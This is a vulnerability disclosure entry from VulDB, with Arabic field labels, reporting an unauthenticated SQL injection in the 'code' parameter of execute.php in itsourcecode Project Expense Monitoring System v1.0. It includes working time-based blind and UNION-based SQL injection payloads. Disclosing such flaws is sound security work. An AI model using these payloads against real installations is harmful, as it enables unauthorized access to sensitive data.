| عنوان | itsourcecode Project Expense Monitoring System v1.0 SQLi |
|---|
| الوصف | Attackers do not need to log in to the backend. They can pass in the code parameter in the execute.php and execute1.php pages and construct special SQL statements to carry out SQLi injection attacks to obtain sensitive data.
POC:
Parameter: code (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: code=1' AND (SELECT 3055 FROM (SELECT(SLEEP(5)))qdgV) AND 'wCrt'='wCrt
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: code=1' UNION ALL SELECT NULL,CONCAT(0x717a717071,0x6a5158484166616e41746e696241666561674a53525661626877575a6f426454534d69745359456c,0x71786a7171),NULL,NULL,NULL,NULL,NULL,NULL-- - |
|---|
| المصدر | ⚠️ https://github.com/DeepMountains/zzz/blob/main/CVE3-2.md |
|---|
| المستخدم | GUOTINGTING (UID 73614) |
|---|
| ارسال | 17/08/2024 02:14 PM (2 سنوات منذ) |
|---|
| الاعتدال | 19/08/2024 04:12 PM (2 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 275119 [itsourcecode Project Expense Monitoring System 1.0 execute.php حقن SQL] |
|---|
| النقاط | 20 |
|---|